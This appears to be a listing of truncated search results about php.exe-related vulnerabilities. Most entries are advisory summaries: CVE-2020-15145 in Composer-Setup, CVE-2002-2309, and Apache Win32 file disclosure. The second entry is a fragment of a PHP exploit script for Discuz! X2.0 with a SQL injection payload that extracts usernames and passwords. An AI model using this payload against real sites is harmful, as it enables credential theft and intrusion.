CVE-2020-15145 Local privilege elevation in Composer-Setup for Windows

In Composer-Setup for Windows before version 6.0.0, if the developer's computer is shared with other users, a local attacker may be able to exploit the following scenarios. 1. A local regular user may modify the existing C:\ProgramData\ComposerSetup\bin\composer.bat in order to get elevated comma...

Discuz! X2. 0 0day EXP-vulnerability warning-the black bar safety net

? php echo "Discuz! X2. 0 0day EXP\n"; echo "By:Steeltiger \n"; echo "php.exe dz2exp.php http://www.xxx.com/ admin\n"; if! empty$argv1 &&! empty$argv2 echo "Start\n"; $exp = base64encode"1' and 1=2 union all select 1,groupconcatusername,0x7C3274747C,password from precommonmember where username li...

CVE-2002-2309

Summary: CVE-2002-2309 affects PHP 3.0–4.2.2 when running on Apache, where php.exe does not terminate properly, enabling a remote attacker to cause a denial of service via a direct request without arguments. The linked Red Hat and CVE records corroborate the vulnerability description across multi...

PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability

A configuration vulnerability exists for PHP.EXE cgi running on Apache for Win32 platforms. It is reported that the installation text recommends configuration options in httpd.conf that create a security vulnerability, allowing arbitrary files to be read from the host running PHP. Remote users ca...

Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure

source: https://www.securityfocus.com/bid/3786/info A vulnerability exists in the suggested default configuration for the Apache PHP.EXE binary on Microsoft Windows platforms. This issue has the potential to disclose the contents of arbitrary files to remote attackers. As a result, it is possible...